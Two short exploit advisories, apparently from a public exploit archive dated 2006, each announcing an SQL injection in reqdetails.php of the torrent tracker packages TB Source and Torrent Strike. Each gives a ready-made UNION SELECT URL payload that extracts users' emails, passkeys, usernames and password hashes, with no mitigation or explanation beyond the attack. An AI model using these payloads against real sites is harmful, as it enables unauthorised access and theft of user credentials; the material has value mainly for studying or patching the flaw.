####################################### # TB Source <= 0.6 reqdetails.php SQL-Injection # Discovered: z01b # Contact: [censored] # Thanx: melco ####################################### -------------------------------------------------- # Details : # Website : http://sourceforge.net/projects/tbsource/ # Vulnerable File : reqdetails.php -------------------------------------------------- Vulnerability: SQL-injection to obtain admin user and hash http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users #29.12.06
####################################### # Torrent Strike <= 0.4 reqdetails.php SQL-Injection # Discovered: z01b # Contact: [censored] # Thanx: melco ####################################### -------------------------------------------------- # Details : # Website : http://sourceforge.net/projects/torrentstrike/ # Vulnerable File : reqdetails.php -------------------------------------------------- SQL querry, for recieving admin user and hash(md5): http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users #29.12.06